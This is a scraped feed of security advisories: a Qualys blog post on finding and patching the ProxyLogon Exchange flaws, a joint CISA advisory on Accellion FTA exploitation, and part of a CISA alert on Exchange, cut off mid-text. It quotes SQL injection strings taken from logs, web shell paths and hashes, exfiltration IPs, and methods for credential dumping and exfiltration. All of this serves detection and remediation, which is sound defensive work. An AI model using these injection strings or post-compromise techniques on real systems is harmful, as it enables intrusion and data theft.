\nReconnaissance| Gather Victim Identity Information| IP Addresses| T1589.005 \nResource Development| Develop Capabilities| Exploits| T1587.004 \nInitial Access| Exploit Public-Facing Application| -| T1190 \nExecution| Command and scripting interpreter| PowerShell| T1059.001 \nPersistence| Create Account| Domain Account| T1136.002 \nPersistence| Server Software Component| Web Shell| T1505.003 \nCredential Access| OS Credential Dumping| LSASS Memory| T1003.001 \nCredential Access| OS Credential Dumping| NTDS| T1003.003 \nLateral Movement| Remote Services| SMB/Windows Admin Shares| T1201.002 \nCollection| Archive Collected Data| Archive via Utility| T1560.001 \nCollection| Email Collection| Remote Email Collection| T1114.002 \nCollection| Email Collection| Local Email Collection| T114.001 \nCommand and Control| Remote Access Software| -| T1219 \nExfiltration| Exfiltration over Web Service| Exfiltration to Cloud Storage| T1567.002 \n \n### Discover and Remediate the Zero-Day Vulnerabilities Using Qualys VMDR\n\n##### Identify Microsoft Exchange Server Assets\n\nThe first step in managing these critical vulnerabilities and reducing risk is identification of assets. [Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) makes it easy to identify Windows Exchange server systems.\n\nQuery: _operatingSystem.category:Server and operatingSystem.category1:`Windows` and software:(name:Microsoft Exchange Server)_\n\n![](https://blog.qualys.com/wp-content/uploads/2021/03/GAI-GIF.gif)\n\nOnce the hosts are identified, they can be grouped together with a \u2018dynamic tag\u2019, let\u2019s say \u2013 \u201cExchange Server 0-day\u201d. This helps in automatically grouping existing hosts with the 0-days as well as any new Windows Exchange server that spins up in your environment. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>).\n\n##### Discover Exchange Server Zero-Day Vulnerabilities\n\nNow that hosts running Microsoft Exchange Server are identified, you want to detect which of these assets have flagged this vulnerability. VMDR automatically detects new vulnerabilities like these based on the always updated KnowledgeBase (KB).\n\nYou can see all your impacted hosts for this vulnerability tagged with the \u2018Exchange Server 0-day\u2019 asset tag in the vulnerabilities view by using this QQL query:\n\nVMDR query: `vulnerabilities.vulnerability.qid:50107`\n\n![](https://blog.qualys.com/wp-content/uploads/2021/03/VMDR-Search-1070x312.png)\n\nQID 50107 is available in signature version VULNSIGS-2.5.121-4 and above and can be detected using authenticated scanning or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) manifest version 2.5.121.4-3 and above.\n\nQualys has released an additional QID: 50108 which remotely detects instances of Exchange Server vulnerable to ProxyLogon vulnerability CVE-2021-26855 without authentication. This QID is not applicable to agents. QID 50108 is available in VULNSIGS-2.5.125-3 version and above.\n\nOrganizations that use on-premises Exchange installations typically also enable Outlook Web Access (OWA), which is exposed to the internet to allow users to connect into their e-mail systems. It is therefore recommended organizations employ both remote and authenticated scanning methods to get the most accurate view of vulnerable assets, as using only the agent-based approach would not provide a comprehensive picture of the vulnerability exposure.\n\nWith VMDR Dashboard, you can track 'Exchange 0-day', impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of the vulnerability trends in your environment using the Exchange Server 0-Day Dashboard.\n\n**Dashboard**: [Exchange Server 0-Day Dashboard | Critical Global View](<https://qualys-secure.force.com/customer/s/article/000006564>)\n\n![](https://blog.qualys.com/wp-content/uploads/2021/03/Dashboard-1070x847.png)\n\n##### Respond by Patching\n\nVMDR rapidly remediates the Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select \u201cqid: 50107\u201d in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go for hosts grouped together by a tag \u2013 Exchange Server 0-day.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/03/Patch-1070x438.png)\n\nSecurity updates are available for the following specific versions of Exchange:\n\n * [Update for Exchange Server 2019](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b>): Requires Cumulative Update (CU) 8 or CU 7\n * [Update for Exchange Server 2016](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b>): Requires CU 19 or CU 18\n * [Update for Exchange Server 2013](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b>): Requires CU 23\n * [Update for Exchange Server 2010](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2010-service-pack-3-march-2-2021-kb5000978-894f27bf-281e-44f8-b9ba-dad705534459>): Requires SP 3 or any SP 3 RU\n * This is a defense-in-depth update.\n\nUsers are encouraged to apply patches as soon as possible.\n\n##### Respond with Mitigation Controls if Patches Cannot Be Applied\n\nWe recognize not all organizations may be able patch their systems right away. In such scenarios Microsoft has recommended a few [interim mitigation controls](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>) to limit the exploitation of these vulnerabilities. [Qualys Policy Compliance](<https://www.qualys.com/apps/policy-compliance/>) has added controls based on these recommendations for impacted Exchange Servers 2013, 2016, and 2019. The vulnerability details and corresponding Control IDs (CIDs) are provided below.\n\n**CVE-2021-26855**: This mitigation will filter https requests that contain malicious X-AnonResource-Backend and malformed X-BEResource cookies which were found to be used in the SSRF attacks in the wild. This will help with defense against the known patterns observed but not the SSRF as a whole.\n\n * **CID 20831** - Status of match URL of rewrite rule 'X-BEResource Abort - inbound' for which action is 'AbortRequest at site level\n * **CID 20834** - Status of match URL of rewrite rule 'X-AnonResource-Backend Abort - inbound' for which action is 'AbortRequest at site level\n\n**CVE-2021-26857**: Disabling the UM Service will mitigate this vulnerability.\n\n * **CID 20829** - Status of 'component' installed on the MS Exchange server\n * **CID 20828** - Status of Microsoft Exchange Unified Messaging Call Router service\n * **CID 20827** - Status of Microsoft Exchange Unified Messaging service\n\n**CVE-2021-27065**: Disabling OAB Application Pool will prevent this CVE from executing successfully as the API will no longer respond and return a 503 when calling OAB, which will mitigate the Arbitrary Write exploit that occurs with OAB. After stopping the WebApp Pool you will also need to set the OabProxy Server Component state to Inactive.\n\n * **CID 20832** - Check the 'startMode' of the OAB Application Pool (MSExchangeOABAppPool)\n\n**CVE-2021-26858**: Disabling ECP Virtual Directory will prevent CVE-2021-27065 from executing successfully as the API will no longer respond and return a 503 when calling the Exchange Control Panel (ECP).\n\n * **CID 20833** - Check the 'startMode' of the ECP Application Pool (MSExchangeECPAppPool)\n\nQualys Policy Compliance can be used to easily monitor these mitigating controls for impacted Exchange assets.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/03/pc1.png)\n\nDrill down into failing controls to view details and identify issues.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/03/pc2.png)\n\n### Post-Compromise Detection Details\n\nAfter compromising a system, an adversary can perform the following activity:\n\nUse legitimate utilities such as procdump or the rundll32 comsvcs.dll method to dump the LSASS process memory. Presumably, this follows exploitation via CVE-2021-26857 as these methods do need administrative privileges.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/03/Image1-Procdump64-1070x452.png)\n\nUse 7-Zip or WinRar to compress files for exfiltration.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/03/Image-2-7z-1070x302.png)\n\nUse PowerShell based remote administration tools such as Nishang & PowerCat to exfiltrate this data.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/03/Image3-Powershell-1070x457.png)\n\nTo maintain persistent access on compromised systems, adversaries may also create a domain user account and install ASPX- and PHP-based web shells for command and control. Information about their probable location and their related hashes are mentioned below.\n\n**Web shell hashes**:\n \n \n b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0\n 097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e\n 2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1\n 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5\n 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1\n 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea\n 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d\n 1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944\n\n**Web shell paths**:\n\n`C:\\inetpub\\wwwroot\\aspnet_client\\ \nC:\\inetpub\\wwwroot\\aspnet_client\\system_web\\ \n%PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ \n%PROGRAMFILES%\\Microsoft\\Exchange Server\\V14\\FrontEnd\\HttpProxy\\owa\\auth\\ \nC:\\Exchange\\FrontEnd\\HttpProxy\\owa\\auth\\`\n\n### References\n\n * https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901\n * https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "cvss3": {}, "published": "2021-03-03T22:12:19", "type": "qualysblog", "title": "Microsoft Exchange Server Zero-Days (ProxyLogon) \u2013 Automatically Discover, Prioritize and Remediate Using Qualys VMDR", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-03-03T22:12:19", "id": "QUALYSBLOG:479A14480548534CBF2C80AFA3FFC840", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ics": [{"lastseen": "2023-09-23T07:19:01", "description": "### Summary\n\nThis joint advisory is the result of a collaborative effort by the cybersecurity authorities of Australia,[[1](<https://www.cyber.gov.au/>)] New Zealand,[[2](<https://www.ncsc.govt.nz/>)] Singapore,[[3](<https://www.csa.gov.sg/>)] the United Kingdom,[[4](<https://www.ncsc.gov.uk/>)] and the United States.[[5](<https://www.cisa.gov/>)][[6](<https://www.cisecurity.org/ms-isac/>)] These authorities are aware of cyber actors exploiting vulnerabilities in Accellion File Transfer Appliance (FTA).[[7](<https://www.accellion.com/company/press-releases/accellion-provides-update-to-recent-fta-security-incident/>)] This activity has impacted organizations globally, including those in Australia, New Zealand, Singapore, the United Kingdom, and the United States.\n\nWorldwide, actors have exploited the vulnerabilities to attack multiple federal and state, local, tribal, and territorial (SLTT) government organizations as well as private industry organizations including those in the medical, legal, telecommunications, finance, and energy sectors. According to Accellion, this activity involves attackers leveraging four vulnerabilities to target FTA customers.[[8](<https://www.accellion.com/company/press-releases/accellion-provides-update-to-recent-fta-security-incident/>)] In one incident, an attack on an SLTT organization potentially included the breach of confidential organizational data. In some instances observed, the attacker has subsequently extorted money from victim organizations to prevent public release of information exfiltrated from the Accellion appliance.\n\nThis Joint Cybersecurity Advisory provides indicators of compromise (IOCs) and recommended mitigations for this malicious activity. For a downloadable copy of IOCs, see: AA21-055B.stix and MAR-10325064-1.v1.stix.\n\nClick here for a PDF version of this report.\n\n### Technical Details\n\nAccellion FTA is a file transfer application that is used to share files. In mid-December 2020, Accellion was made aware of a zero-day vulnerability in Accellion FTA and released a patch on December 23, 2020. Since then, Accellion has identified cyber actors targeting FTA customers by leveraging the following additional vulnerabilities.\n\n * [CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>) \u2013 Structured Query Language (SQL) injection via a crafted HOST header (affects FTA 9_12_370 and earlier)\n * [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>) \u2013 Operating system command execution via a local web service call (affects FTA versions 9_12_411 and earlier)\n * [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>) \u2013 Server-side request forgery via a crafted POST request (affects FTA 9_12_411 and earlier)\n * [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>) \u2013 Operating system command execution via a crafted POST request (affects FTA 9_12_370 and earlier)\n\nOne of the exploited vulnerabilities (CVE-2021-27101) is an SQL injection vulnerability that allows an unauthenticated user to run remote commands on targeted devices. Actors have exploited this vulnerability to deploy a webshell on compromised systems. The webshell is located on the target system in the file `/home/httpd/html/about.html `or `/home/seos/courier/about.html`. The webshell allows the attacker to send commands to targeted devices, exfiltrate data, and clean up logs. The clean-up functionality of the webshell helps evade detection and analysis during post incident response. The Apache `/var/opt/cache/rewrite.log` file may also contain the following evidence of compromise:\n\n * `[.'))union(select(c_value)from(t_global)where(t_global.c_param)=('w1'))] (1) pass through /courier/document_root.html`\n * `[.'))union(select(reverse(c_value))from(t_global)where(t_global.c_param)=('w1'))] (1) pass through /courier/document_root.html`\n * `['))union(select(loc_id)from(net1.servers)where(proximity)=(0))] (1) pass through /courier/document_root.html`\n\nThese entries are followed shortly by a pass-through request to `sftp_account_edit.php`. The entries are the SQL injection attempt indicating an attempt at exploitation of the HTTP header parameter `HTTP_HOST`.\n\nApache access logging shows successful file listings and file exfiltration:\n\n * `\u201cGET /courier/about.html?aid=1000 HTTP/1.1\u201d 200 {Response size}`\n * `\u201cGET /courier/about.htmldwn={Encrypted Path}&fn={encrypted file name} HTTP/1.1\u201d 200 {Response size}`\n\nWhen the clean-up function is run, it modifies archived Apache access logs `/var/opt/apache/c1s1-access_log.*.gz` and replaces the file contents with the following string:\n\n`Binary file (standard input) matches`\n\nIn two incidents, the Cybersecurity and Infrastructure Security Agency (CISA) observed a large amount of data transferred over port 443 from federal agency IP addresses to `194.88.104[.]24`. In one incident, the Cyber Security Agency of Singapore observed multiple TCP sessions with IP address `45.135.229[.]179`.\n\nOrganizations are encouraged to investigate the IOCs outlined in this advisory and in [AR21-055A](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a>). If an Accellion FTA appears compromised, organizations can get an indication of the exfiltrated files by obtaining a list of file-last-accessed events for the target files of the symlinks located in the` /home/seos/apps/1000/` folder over the period of malicious activity. This information is only indicative and may not be a comprehensive identifier of all exfiltrated files.\n\n### Mitigations\n\nOrganizations with Accellion FTA should:\n\n * Temporarily isolate or block internet access to and from systems hosting the software.\n * Assess the system for evidence of malicious activity including the IOCs, and obtain a snapshot or forensic disk image of the system for subsequent investigation.\n * If malicious activity is identified, obtain a snapshot or forensic disk image of the system for subsequent investigation, then: \n * Consider conducting an audit of Accellion FTA user accounts for any unauthorized changes, and consider resetting user passwords.\n * Reset any security tokens on the system, including the \u201cW1\u201d encryption token, which may have been exposed through SQL injection.\n * Update Accellion FTA to version FTA_9_12_432 or later.\n * Evaluate potential solutions for migration to a supported file-sharing platform after completing appropriate testing. \n * Accellion has announced that FTA will reach end-of-life (EOL) on April 30, 2021.[[9](<https://www.accellion.com/sites/default/files/resources/fta-eol.pdf>)] Replacing software and firmware/hardware before it reaches EOL significantly reduces risks and costs.\n\nAdditional general best practices include:\n\n * Deploying automated software update tools to ensure that third-party software on all systems is running the most recent security updates provided by the software vendor.\n * Only using up-to-date and trusted third-party components for the software developed by the organization.\n * Adding additional security controls to prevent the access from unauthenticated sources.\n\n### Resources\n\n * FireEye Blog \u2013 Cyber Criminals Exploit Accellion FTA for Data Theft and Extortion \n * [https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html ](<https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html>)\n * Center for Internet Security (CIS) Critical Security Controls for Effective Cyber Defense, known as \"CIS Controls\" \n * <https://www.cisecurity.org/controls/>\n * <https://www.cisecurity.org/ms-isac/>\n * Australia, Canada, New Zealand, the United Kingdom, and the United States Joint Advisory on Technical Approaches to Uncovering and Remediating Malicious Activity \n * <https://us-cert.cisa.gov/ncas/alerts/aa20-245a>\n * CISA and MS-ISAC\u2019s Ransomware Guide \n * <https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware%20Guide_S508C.pdf>\n\n### References\n\n[[1] Australian Cyber Security Centre (ACSC)](<https://www.cyber.gov.au/>)\n\n[[2] New Zealand National Cyber Security Centre (NZ NCSC)](<https://www.ncsc.govt.nz/>)\n\n[[3] Singapore Cyber Security Agency (CSA)](<https://www.csa.gov.sg/>)\n\n[[4] United Kingdom National Cyber Security Centre (UK NCSC)](<https://www.ncsc.gov.uk/>)\n\n[[5] United States Cybersecurity and Infrastructure Security Agency (CISA)](<https://www.cisa.gov/>)\n\n[[6] United States Multi-State Information Sharing and Analysis Center (MS-ISAC)](<https://www.cisecurity.org/ms-isac/>)\n\n[[7] Accellion Press Release: Update to Recent FTA Security Incident ](<https://www.accellion.com/company/press-releases/accellion-provides-update-to-recent-fta-security-incident/>)\n\n[[8] Accellion Press Release: Update to Recent FTA Security Incident](<https://www.accellion.com/company/press-releases/accellion-provides-update-to-recent-fta-security-incident/>)\n\n[[9] Accellion Announcement: End-of-Life for Legacy FTA Software](<https://www.accellion.com/sites/default/files/resources/fta-eol.pdf>)\n\n### Revisions\n\nFebruary 24, 2021: Initial Version|June 17, 2021: Replaced STIX file to remove an IOC reported as non-malicious.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-17T12:00:00", "type": "ics", "title": "Exploitation of Accellion File Transfer Appliance", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2021-06-17T12:00:00", "id": "AA21-055A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-055a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-23T07:18:41", "description": "### Summary\n\n_Updated July 19, 2021: The U.S. Government attributes this activity to malicious cyber actors affiliated with the People's Republic of China (PRC) Ministry of State Security (MSS). Additional information may be found in a [statement from the White House](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/07/19/the-united-states-joined-by-allies-and-partners-attributes-malicious-cyber-activity-and-irresponsible-state-behavior-to-the-peoples-republic-of-china/>). For more information on Chinese malicious cyber activity, refer to [us-cert.cisa.gov/China](<https://us-cert.cisa.gov/china>)._\n\n_**Note:** This Alert was updated April 13, 2021, to provide further guidance. _\n\nCybersecurity and Infrastructure Security Agency (CISA) partners have observed active exploitation of vulnerabilities in Microsoft Exchange Server products. Successful exploitation of these vulnerabilities allows an unauthenticated attacker to execute arbitrary code on vulnerable Exchange Servers, enabling the attacker to gain persistent system access, as well as access to files and mailboxes on the server and to credentials stored on that system. Successful exploitation may additionally enable the attacker to compromise trust and identity in a vulnerable network. Microsoft released out-of-band patches to address vulnerabilities in Microsoft Exchange Server. The vulnerabilities impact on-premises Microsoft Exchange Servers and are not known to impact Exchange Online or Microsoft 365 (formerly O365) cloud email services.\n\nThis Alert includes both tactics, techniques and procedures (TTPs) and the indicators of compromise (IOCs) associated with this malicious activity. To secure against this threat, CISA recommends organizations examine their systems for the TTPs and use the IOCs to detect any malicious activity. If an organization discovers exploitation activity, they should assume network identity compromise and follow incident response procedures. If an organization finds no activity, they should apply available patches immediately and implement the mitigations in this Alert.\n\nClick here for IOCs in STIX format.\n\n### Technical Details\n\n_(Updated April 14, 2021)_: [Microsoft's April 2021 Security Update](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Apr>) newly discloses and mitigates significant vulnerabilities affecting on-premises Exchange Server 2013, 2016, and 2019.\n\nMicrosoft has released out-of-band security updates to address four vulnerabilities in Exchange Server:\n\n * [CVE-2021-26855](<https://vulners.com/cve/CVE-2021-26855>) allows an unauthenticated attacker to send arbitrary HTTP requests and authenticate as the Exchange Server. The vulnerability exploits the Exchange Control Panel (ECP) via a Server-Side Request Forgery (SSRF). This would also allow the attacker to gain access to mailboxes and read sensitive information.\n * [CVE-2021-26857](<https://vulners.com/cve/CVE-2021-26857>), [CVE-2021-26858](<https://vulners.com/cve/CVE-2021-26858>), and [CVE-2021-27065](<https://vulners.com/cve/CVE-2021-27065>) allow for remote code execution. \n * CVE-2021-26858 and CVE-2021-27065 are similar post-authentication arbitrary write file vulnerabilities in Exchange. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could write a file to any path on the server.\n\n * CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could execute arbitrary code as `SYSTEM `on the Exchange Server.\n\n * To locate a possible compromise of these CVEs, CISA encourages organizations read the [Microsoft Advisory](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>).\n\nIt is possible for an attacker, once authenticated to the Exchange server, to gain access to the Active Directory environment and download the Active Directory Database.\n\n_(Updated March 12, 2021):_ Microsoft Security Intelligence has released a [tweet](<https://twitter.com/MsftSecIntel/status/1370236539427459076>) on [DearCry](<https://www.bleepingcomputer.com/news/security/ransomware-now-attacks-microsoft-exchange-servers-with-proxylogon-exploits/>) ransomware being used to exploit compromised on-premises Exchange Servers. Ransomware infections can have negative consequences to an affected organization, including:\n\n * temporary or permanent loss of sensitive or proprietary information,\n * disruption to regular operations,\n * financial losses incurred to restore systems and files, and\n * potential harm to an organization\u2019s reputation.\n\n(_Updated April 12, 2021_): CISA recommends organizations review Malware Analysis Report (MAR) [MAR-10330097-1.v1 \u2013 DearCry Ransomware](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-102b>) for detailed analysis, along with TTPs and IOCs.\n\n_(Updated March 12, 2021): _CISA encourages organizations to review CISA\u2019s [Ransomware web page](<https://www.cisa.gov/ransomware>) for guidance and resources. Victims of ransomware should report it immediately to CISA at [www.us-cert.gov/report](<https://www.us-cert.gov/report>), a local[ FBI Field Office](<https://www.fbi.gov/contact-us/field-offices>), or [Secret Service Field Office](<http://www.secretservice.gov/contact/field-offices/>).\n\n### Tactics, Techniques and Procedures\n\n_(Updated March 10, 2021):_ Microsoft has released a script that scans Exchange log files for IOCs. CISA strongly encourages organizations to run the [Test-ProxyLogon.ps1 script](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>)\u2014as soon as possible\u2014to help determine whether their systems are compromised.\n\n_(Updated March 16, 2021): _**Note:** Microsoft has released the [Exchange On-premises Mitigation Tool (EOMT.ps1)](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) that can automate portions of both the detection and patching process. Microsoft stated the following along with the release: \"[the tool is intended] to help customers who do not have dedicated security or IT teams to apply these security updates. We have tested this tool across Exchange Server 2013, 2016, and 2019 deployments. This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.\u201d Review the [EOMT.ps1 blog post](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) for directions on using the tool.\n\n_(Updated March 10, 2021):_ CISA recommends investigating for signs of a compromise from at least January 1, 2021 through present.\n\n_(Updated April 12, 2021): _CISA has identified 10 webshells associated with this activity. This is not an all-inclusive list of webshells that are being leveraged by actors. CISA recommends organizations review the following MARs for detailed analysis of the 10 webshells, along with TTPs and IOCs. These MARs include CISA-developed YARA rules to help network defenders detect associated malware.\n\n 1. AR21-072A: [MAR-10328877.r1.v1: China Chopper Webshell](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-072a>)\n 2. AR21-072B: [MAR-10328923.r1.v1: China Chopper Webshell](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-072b>)\n 3. AR21-072C: [MAR-10329107.r1.v1: China Chopper Webshell](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-072c>)\n 4. AR21-072D: [MAR-10329297.r1.v1: China Chopper Webshell](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-072d>)\n 5. AR21-072E: [MAR-10329298.r1.v1: China Chopper Webshell](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-072e>)\n 6. AR21-072F: [MAR-10329301.r1.v1: China Chopper Webshell](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-072f>)\n 7. AR21-072G: [MAR-10329494.r1.v1: China Chopper Webshell](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-072g>)\n 8. AR21-084A: [MAR-10329496-1.v1: China Chopper Webshell](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-084a>)\n 9. AR21-084B: [MAR-10329499-1.v1: China Chopper Webshell ](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-084b>)\n 10. AR21-102A: [MAR-10331466-1.v1: China Chopper Webshell](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-102a>)\n\n_(Updated March 13, 2021):_ A webshell is a script that can be uploaded to a compromised Microsoft Exchange Server to enable remote administration of the machine. Webshells are utilized for the following purposes:\n\n * To harvest and exfiltrate sensitive data and credentials;\n * To upload additional malware for the potential of creating, for example, a watering hole for infection and scanning of further victims;\n * To use as a relay point to issue commands to hosts inside the network without direct internet access;\n * To use as command-and-control infrastructure, potentially in the form of a bot in a botnet or in support of compromises to additional external networks. This could occur if the adversary intends to maintain long-term persistence.\n\n_(Updated March 13, 2021): _For more information, see [TA15-314A Compromised Web Servers and Web Shells - Threat Awareness and Guidance](<https://us-cert.cisa.gov/ncas/alerts/TA15-314A>).\n\nThe majority of the TTPs in this section are sourced from a [blog post from Volexity](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>), a third-party cybersecurity firm. **Note: **the United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.\n\nVolexity has observed the following files as targets of `HTTP POST` requests:\n\n * `/owa/auth/Current/themes/resources/logon.css`\n * `/owa/auth/Current/themes/resources/owafont_ja.css`\n * `/owa/auth/Current/themes/resources/lgnbotl.gif`\n * `/owa/auth/Current/themes/resources/owafont_ko.css`\n * `/owa/auth/Current/themes/resources/SegoeUI-SemiBold.eot`\n * `/owa/auth/Current/themes/resources/SegoeUI-SemiLight.ttf`\n * `/owa/auth/Current/themes/resources/lgnbotl.gif`\n\nAdministrators should search the ECP server logs for the following string (or something similar):\n\n`S:CMD=Set-OabVirtualDirectory.ExternalUrl='`\n\nThe logs can be found at `<exchange install path>\\Logging\\ECP\\Server\\`.\n\nTo determine possible webshell activity, administrators should search for `aspx` files in the following paths:\n\n * `\\inetpub\\wwwroot\\aspnet_client\\ `(any `.aspx` file under this folder or sub folders)\n * `\\<exchange install path>\\FrontEnd\\HttpProxy\\ecp\\auth\\ `(any file besides `TimeoutLogoff.aspx`)\n * `\\<exchange install path>\\FrontEnd\\HttpProxy\\owa\\auth\\ `(any file or modified file that is not part of a standard install)\n * `\\<exchange install path>\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\ `(any `aspx `file in this folder or subfolders)\n * `\\<exchange install path>\\FrontEnd\\HttpProxy\\owa\\auth\\<folder with version number>\\ `(any `aspx `file in this folder or subfolders)\n\nAdministrators should search in the `/owa/auth/Current` directory for the following non-standard web log user-agents. These agents may be useful for incident responders to look at to determine if further investigation is necessary.\n\nThese should not be taken as definitive IOCs:\n\n * `DuckDuckBot/1.0;+(+http://duckduckgo.com/duckduckbot.html)`\n * `facebookexternalhit/1.1+(+http://www.facebook.com/externalhit_uatext.php)`\n * `Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)`\n * `Mozilla/5.0+(compatible;+Bingbot/2.0;++http://www.bing.com/bingbot.htm)`\n * `Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html`\n * `Mozilla/5.0+(compatible;+Konqueror/3.5;+Linux)+KHTML/3.5.5+(like+Gecko)+(Exabot-Thumbnails)`\n * `Mozilla/5.0+(compatible;+Yahoo!+Slurp;+http://help.yahoo.com/help/us/ysearch/slurp)`\n * `Mozilla/5.0+(compatible;+YandexBot/3.0;++http://yandex.com/bots)`\n * `Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36`\n\nVolexity observed these user-agents in conjunction with exploitation to `/ecp/ `URLs:\n\n * `ExchangeServicesClient/0.0.0.0`\n * `python-requests/2.19.1`\n * `python-requests/2.25.1`\n\nThese user-agents were also observed having connections to post-exploitation web-shell access:\n\n * `antSword/v2.1`\n * `Googlebot/2.1+(+http://www.googlebot.com/bot.html)`\n * `Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)`\n\nAs with the non-standard user-agents, responders can examine internet information services (IIS) logs from Exchange Servers to identify possible historical activity. Also, as with the non-standard user agents, these should not be taken as 